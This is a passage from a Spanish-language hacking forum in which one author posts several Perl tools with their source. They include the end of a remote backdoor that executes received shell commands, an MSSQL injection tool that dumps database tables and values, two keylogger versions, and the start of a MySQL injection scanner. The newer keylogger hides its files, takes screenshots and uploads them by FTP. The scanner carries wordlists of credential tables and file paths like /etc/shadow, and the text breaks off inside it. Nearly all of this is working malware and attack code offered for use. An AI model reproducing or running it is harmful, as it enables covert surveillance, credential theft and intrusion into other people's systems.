if ($resultado=~/chdirnow K0BRA(.*)K0BRA/ig) {

my $dir = $1;
$dir =~s/(\s)+$//;


if (chdir($dir)) {
print $con "ok\r\n"; 
} 

}

if ($resultado=~/borrardir K0BRA(.*)K0BRA/ig) {

my $veox = $1;
$veox =~s/(\s)+$//;

if (rmdir(getcwd()."/".$veox)) {
print $con "ok\r\n"; 
}
}



if ($resultado=~/pararmusic/ig) {
$test->close;
}



if ($resultado=~/dirnow ACATOY(.*)/ig) {

my $real = $1;
chomp $real;

$real =~s/(\s)+$//;

print "real $real\n\n";

my @archivos = coleccionar($real);

for (@archivos) {
print $_."\n";
my $todo = $real."/".$_;

print $todo."\n";

if (-f $todo) {
print $con "FILEX".$_."FILEX"."\r\n";
print "File : ".$_."\n";
}

if (-d $todo) {
print $con "DIREX".$_."DIREX"."\r\n";
print "Dir : ".$_."\n";
}

}
}

sub coleccionar {
opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}

if ($resultado=~/getcwd/ig) {
print "envie ".getcwd()."\n\n";
print $con getcwd()."\r\n";
}


if ($resultado=~/mostrarpro/ig) {


my $new = Win32::Process::List->new();  
my %process = $new->GetProcesses();
for my $pid (keys %process) {
print $con "PROXEC".$process{$pid}."PROXEC\r\n";
print $con "PIDX".$pid."PIDX\r\n";

}


}

if ($resultado=~/crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY/ig) {
my $name = $1;
my $file = $2;

chomp $name;
chomp $file;

$name =~s/(\s)+$//;
$file =~s/(\s)+$//;

print "name is $name end\n";
print "file is $file end\n";

open FILE,">>".$name;
print FILE $file."\n";
close FILE;
}

if ($resultado=~/comando :(.*):/ig) {
print "llego comando $1\n";
print $resultado;
my $temp = qx($1);
print $con $temp."\r";
}

if ($resultado=~/iniciochau/g) {
inicio_chau("Shell_TrayWnd");
} 
if ($resultado=~/iniciovuelve/g) {
inicio_vuelve("Shell_TrayWnd");
} else {
print $resultado;
}
if ($resultado=~/iconovuelve/g) {
icono_vuelve("Program Manager");
}
if ($resultado=~/iconochau/g) {
icono_chau("Program Manager");
}


sub icono_vuelve {
$handle = $a->Call(0,$_[0]);
$b->Call($handle,SW_SHOWNORMAL);

}

sub icono_chau {

$handle = $a->Call(0,$_[0]);
$b->Call($handle,SW_HIDE);

}

sub inicio_vuelve {
$handlex = $a->Call($_[0],0);
$b->Call($handlex,SW_SHOWNORMAL);

}

sub inicio_chau {

$handlea = $a->Call($_[0],0);
$b->Call($handlea,SW_HIDE);

}


}


# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/nefaster/

#341

Perl / [Perl] MSSQL T00l

Julio 03, 2011, 09:47:39 PM

Bueno , aca les traigo una tool en perl para
buscar tablas y columnas con information_schema en MSSQL
Tambien pueden sacar los valores que quieren de las columnas.

Código: perl


#!usr/bin/perl
#MSSQL T00l
#(C) Doddy Hackman 2011


use LWP::UserAgent;
use HTTP::Request::Common;

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

sub head {
print q(

 @@    @@   @@@@  @@@@   @@@    @@     @@@@@@  @@@      @@@    @@  
 @@@  @@@  @@  @ @@  @  @@@@@   @@       @@   @@@@@    @@@@@   @@  
 @@@  @@@  @@    @@    @@   @@  @@       @@  @@   @@  @@   @@  @@  
@@@@@@@@@@  @@@   @@@  @@   @@  @@       @@  @@   @@  @@   @@  @@  
@@ @@@@ @@    @@    @@ @@ @@@@  @@       @@  @@   @@  @@   @@  @@  
@@  @@  @@ @  @@ @  @@  @@@@@   @@       @@   @@@@@    @@@@@   @@  
@@  @@  @@ @@@@  @@@@    @@@@@  @@@@     @@    @@@      @@@    @@@@
                                                                  


);
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
<stdin>;
exit(1);
}

repe();

sub repe {

system("cls");


head();


print "\n\n[Page] : ";
chomp(my $page=<stdin>);

$code = toma($page);

if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
print "\n\n[+] The page is vulnerable to MSSQL Injection\n\n";
} else {
print "\n\n[-] Not vulnerable\n\n";
#copyright();
}

menu:

print q(

##################################

1 - Dump tables
2 - Dump Columns of the a table
3 - Dump values
4 - Change target
5 - Exit

##################################


);

print "[Opcion] : ";
chomp(my $op=<stdin>);

if ($op eq 1) {
print "\n\n[*] Dumping tables...\n\n";
mssql_tables($page);
goto menu;
}
elsif ($op eq 2) {
print "\n\n[Table] : ";
chomp (my $tab = <stdin>);
print "\n\n[*] Dumping columns..\n\n";
mssql_columns($page,$tab);
goto menu;
}
elsif($op eq 3) {
print "\n\n[Table] : ";
chomp (my $tab=<stdin>);
print "\n\n[Column] : ";
chomp(my $col=<stdin>);
print "\n\n[*] Dumping values..\n\n";
mssql_data($page,$tab,$col);
goto menu;
}
elsif ($op eq 4) {
repe();
}
elsif ($op eq 5) {
copyright();
}
else {
goto menu;
} 

#@tables = mssql_tables("http://www.12manage.com/profile.asp?m=drarupbarman'","Users");


sub mssql_columns {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$_[1]."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Column found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}

sub mssql_tables {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Table found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}

sub mssql_data {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$_[2].$pass1."from".$pass1.$_[1].$pass1."where".$pass1.$_[2].$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Data found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}


sub toma {
return $nave->request(GET $_[0])->content;
}


# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/mssqltool/

#342

Perl / [Perl] Manager

Julio 03, 2011, 09:47:26 PM

Bueno , aca les traigo un programa que los ayudara a listar todos los
procesos y cerrar el que quieran
En esta version podran tener una interfaz grafica

Código: perl


#!usr/bin/perl
#Manager (C) Doddy Hackman 2010
#Module neccesary
#ppm install http://trouchelle.com/ppm/Win32-Process-List.ppd 

use Win32::Process::List;
use Win32::Process;
use Tk;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

$new = MainWindow->new(-background=>"black");
$new->geometry("250x300+20+20");
$new->resizable(0,0);
$new->title("Manager 0.1");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Process")->pack();
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"50",-x=>"60");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Close",-activebackground=>"green",-width=>"40",-command=>\&close)->place(-y=>"218");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Refresh",-width=>"40",-activebackground=>"green",-command=>\&refresh)->place(-y=>"240");
$new->Button(-background=>"black",-foreground=>"green",-text=>"About",-width=>"40",-activebackground=>"green",-command=>\&about)->place(-y=>"263");	

&refresh;

MainLoop;


sub refresh {

my @pids;
my @procer;
my $limit;

$lists->delete(0.0,"end");

my $new = Win32::Process::List->new();  
my %process = $new->GetProcesses();
my $limit = -1;
for my $pid (keys %process) {
$limit++;
push (@procer,$process{$pid});
push (@pids,$pid);
}
print "\n\n[+] ".int(@procer)."\n\n";
for my $n(0..$limit) {
print $procer[$n]."\n";
$lists->insert("end",$procer[$n]);
}
	

}

sub close {

$d = $lists->curselection();

for my $id (@$d) {

my $proceso = $lists->get($id);

my $pida = Win32::Process::List->new();
my @pid = $pida->GetProcessPid($proceso);

Win32::Process::KillProcess(@pid[1],$proceso);
sleep 3;
&refresh();
}
}



sub about {
$about = MainWindow->new(-background=>"black");
$about->title("About");
$about->geometry("150x100+20+20");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Coded By Doddy H")->pack();
$about->Label(-background=>"black",-foreground=>"green")->pack();
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"2011")->pack();
}



# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/managerx/

#343

Perl / [Perl] Keycagator 0.7

Julio 03, 2011, 09:47:14 PM

Hola a todos , aca les traigo la nueva version de este keylogger
En esta version ya es aceptable con las siguientes opciones

Captura letras reconociendo mayusculas y minusculas
Captura ventanas en la que se trabaja
Toma fotos del sistema cada 1 minuto
Sube logs y fotos tomadas por FTP

Oculta rastros

Código: perl


#!usr/bin/perl
#KeyCagator 0.7 (C) Doddy Hackman 2011
#

use Win32::API;
use Win32::GuiTest qw(GetForegroundWindow GetWindowText FindWindowLike SetForegroundWindow SendKeys);
use Win32::Clipboard;
use threads;
use Net::FTP;
use Win32::File;
use Cwd;

my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
my $tengo = 0;	

#if ($^O eq 'MSWin32') {
#use Win32::Console; 
#Win32::Console::Free();
#}

hideit($0,"hide");

subirftp("logs.txt","logs.txt");

my $comando1 = threads->new(\&capture_windows);
my $comando2 = threads->new(\&capture_keys);
my $comando3 = threads->new(\&capture_screen);

$comando1->join();
$comando2->join();
$comando3->join();


sub capture_windows {

while(1) {

my $win1 = GetForegroundWindow();         
my $win2 = GetForegroundWindow(); 

if($win1 != $win2){
my $nombre = GetWindowText($win1); 
chomp($nombre);
if ($nombre ne "") {
#print "\n\n[".$nombre."]\n\n";
savefile("logs.txt","\n\n[".$nombre."]\n\n");
}
}
}
return 1;
}
	
sub capture_keys {

while(1) {

my $test1;
my $test2;

for my $num(0x30..0x39) { #Numbers	

if (dame($num)) {
#print "number : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}
}

if (dame(0x14)) {
$test1 = 1;
$tengo++;
}

for my $num(0x41..0x5A) {	#Words

if (dame($num)) {

if (dame(0x20)) {
savefile("logs.txt"," ");
}

if (dame(0x32)) {
savefile("logs.txt","\n[enter]\n\n");
}

unless (verpar($tengo) eq 1) {
#print "MAYUSCULA : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}

if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
#print "MAYUSCULA : ".chr($num)."\n";
$test2 = 1;
}

unless ($test1 eq 1 or $test2 eq 1) {
if ($num >= 0x41) {
if ($num <= 0x5A) {
if (verpar($tengo) eq 1) {
#print "MINUSCULA : ".chr($num+32)."\n";
savefile("logs.txt",chr($num+32));
}
}
}
} 
}
}
}
return 1;
}

sub capture_screen {

$numero = 0;

while(1) {

sleep 60;

$numero++;

SetForegroundWindow(1);
SendKeys('%{PRTSCR}'); 

my $a = Win32::Clipboard::GetBitmap();

open (FOTO,">".$numero.".bmp");
binmode(FOTO);
print FOTO $a;
close FOTO;

hideit($numero.".bmp","hide");
subirftp($numero.".bmp",$numero.".bmp");
}
}

sub dame {
return($come->Call(@_) & 1);
}

sub savefile {

open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE; 

hideit($_[0],"hide");

}

sub hideit {
if ($_[1] eq "show") {
Win32::File::SetAttributes($_[0],NORMAL);
}
elsif ($_[1] eq "hide") {
Win32::File::SetAttributes($_[0],HIDDEN);
}
else {
print "error\n";
}
}

sub subirftp {

if ($ser = Net::FTP->new("localhost")) {
if ($ser->login("doddy","123")) {
print "subi".getcwd()."/".$_[0]."\n";
if ($ser->put(getcwd()."/".$_[0],$_[1])) {
return true;
}
}
$ser->close;
}


}

sub verpar{ 
return ($_[0] % 2 == 0) ? "1" : "2";
}


#Credits : to explorer for helpme with the function verpar()
#Mail : lepuke[at]hotmail[com]
#Blog : doddy-hackman.blogspot.com
# ¿ The End ?

#344

Perl / [Perl] KeyCagator 0.4

Julio 03, 2011, 09:46:58 PM

Bueno , este es un keylogger en perl que hice con las siguientes opciones

* Captura teclas reconociendo mayusculas y minusculas
* Muestra ventanas en las que se esta trabajando

Pocas opciones pero mejor la version anterior

Código: perl


#!usr/bin/perl
#KeyCagator 0.4 (C) Doddy Hackman 2010
#

use Win32::API;
use Win32::GuiTest qw(GetForegroundWindow GetWindowText);

my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
my $tengo = 0;	

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

while (true) {

capture_windows();
capture_keys();

}

sub capture_windows {

my $win1 = GetForegroundWindow();         
my $win2 = GetForegroundWindow(); 

if($win1 != $win2){
my $nombre = GetWindowText($win1); 
chomp($nombre);
if ($nombre ne "") {
#print "\n\n[".$nombre."]\n\n";
savefile("logs.txt","\n\n[".$nombre."]\n\n");
}
}

}
	
sub capture_keys {

my $test1;
my $test2;


capture_windows();

for my $num(0x30..0x39) { #Numbers	

capture_windows();

if (dame($num)) {
#print "number : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}
}

if (dame(0x14)) {
$test1 = 1;
$tengo++;
}

for my $num(0x41..0x5A) {	#Words


capture_windows();

if (dame($num)) {


if (dame(0x0d)) {
savefile("logs.txt","\n\n[enter]\n\n");
}

unless (verpar($tengo) eq 1) {
#print "MAYUSCULA : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}

if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
#print "MAYUSCULA : ".chr($num)."\n";
$test2 = 1;
}

unless ($test1 eq 1 or $test2 eq 1) {
if ($num >= 0x41) {
if ($num <= 0x5A) {
if (verpar($tengo) eq 1) {
#print "MINUSCULA : ".chr($num+32)."\n";
savefile("logs.txt",chr($num+32));
}
}
}
} 
}
}

}

sub dame {
return($come->Call(@_) & 1);
}

sub savefile {
open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE; 
}

sub verpar{ 
return ($_[0] % 2 == 0) ? "1" : "2";
}


#Credits : to explorer for helpme with the function verpar()
#Mail : lepuke[at]hotmail[com]
#Blog : doddy-hackman.blogspot.com
# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/keycagator/

#345

Perl / [Perl] K0bra 0.5

Julio 03, 2011, 09:46:20 PM

Bueno esta es la nueva version de un scanner sqli que habia hecho ,
le arregle varios errores y agregue algunas cosas

Código: perl


#!usr/bin/perl
#k0bra 0.5
#Automatic SQL Scanner for MYSQL
#(c)0ded By Doddy H
#
#
#C:\Users\DoddyH>perl k0bra.pl http://127.0.0.1/sql.php?id= --
#
#
#
#
# @      @@   @
#@@     @  @ @@
# @ @@  @  @  @ @   @ @ @@@
# @ @   @  @  @@ @ @@@ @  @
# @@    @  @  @  @  @   @@@
# @ @   @  @  @  @  @  @  @
#@@@ @   @@   @@@  @@@ @@@@@
#
#
#
#
#[Status] : Scanning.....
#[Status] : Enjoy the menu
#
#[Target confirmed] : http://127.0.0.1/sql.php?id=-1+union+select+hackman,2,3
#[Bypass] : --
#
#
#
#--== information_schema.tables ==--
#
#[1] : Show tables
#[2] : Show columns
#[3] : Show DBS
#[4] : Show tables witg other DB
#[5] : Show columns with other DB
#
#
#--== mysql.user ==--
#
#[6] : Show users
#
#
#--== Others ==--
#
#[7] : Fuzzing tables
#[8] : Fuzzing columns
#[9] : Fuzzing files with load_file
#[10] : Dump
#[11] : Informacion of the server
#[12] : Create a shell with into outfile
#[13] : Show Log
#[14] : Exit
#
#
#[Option] : Enjoy this program xDDDDD
#
 
system('cls');
system ("title k0bra");



@buscar1 =('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users','name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios','miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores','administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user','user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name','member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre','user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente','sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','curso','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead','associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users','tuser','tusers','utilisateurs','amministratore','god','God','authors','wp_users','tb_usuarios','asociado','asociados','autores','autor','Users','Admin','Members','tb_usuario','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO','USR_NAME','about','access','admin_id','admin_name','admin_pass','admin_passwd','admin_password','admin_pwd','admin_user','admin_userid','admin_username','adminemail','adminid','administrator_name','adminlogin','adminmail','adminname','adminuser','adminuserid','adminusername','aid','aim','apwd','auid','authenticate','authentication','blog','cc_expires','cc_number','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','contact','converge_pass_hash','converge_pass_salt','crack','customers_email_address','customers_password','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e_mail','emer','emni','emniplote','emri','fjalekalimi','fjalekalimin','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id','id_group','id_member','images','ime','index','ip_address','kodi','korisnici','korisnik','kpro_user','last_ip','last_login','lastname','llogaria','login_admin','login_name','login_pass','login_passwd','login_password','login_pw','login_pwd','login_user','login_username','logini','loginkey','loginout','logo','logohu','lozinka','md5hash','mem_login','mem_pass','mem_passwd','mem_password','mem_pwd','member_id','member_login_key','member_name','memberid','memlogin','mempassword','my_email','my_name','my_password','my_username','myname','mypassword','myusername','nc','new','news','number','nummer','p_assword','p_word','pass_hash','pass_w','pass_word','pass1word','passw','passwordsalt','passwort','passwrd','perdorimi','perdoruesi','personal_key','phone','privacy','psw','punetoret','punonjes','pword','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','sifra','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','uid','uname','user_admin','user_icq','user_id','user_ip','user_level','user_login','user_n','user_pass','user_passw','user_passwd','user_pw','user_pwd','user_pword','user_pwrd','user_un','user_uname','user_username','user_usernm','user_usernun','user_usrnm','user1','useradmin','userid','userip','userlogin','usern','usernm','userpass','userpassword','userpw','userpwd','usr_n','usr_name','usr_pass','usr2','usrn','usrnam','usrname','usrnm','usrpass','warez','xar_name','xar_pass','nom dutilisateur','mot de passe','compte','comptes','aide','objectif','authentifier','authentification','Contact','fissure','client','clients','de donn?es','mot_de_passe_bdd','t?l?charger','E-mail','adresse e-mail','Emer','complet','groupe','hachage','Page daccueil','Kodi','nom','connexion','membre','MEMBERNAME','mon_mot_de_passe','monmotdepasse','ignatiusj','caroline-du-nord','nouveau','Nick','passer','Passw','Mot de passe','t?l?phone','protection de la vie priv?e','PSW','pWord','sel','recherche','de s?rie','param?tre','?tat','stocker','texte','cvvnumber');

@buscar2 = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario','login_id','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username','sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave','membername','nme','unme','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','ÃÜÂë','aut','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login_admin','login_admins','login_user','login_users','logins','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','ÓÃ»§','obb_profiles','order','orders','parol','partner','partners','passes','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user_admin','user_info','user_list','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','jos_user','table_user','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins');


@buscar3 =('c:/xampp/log.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi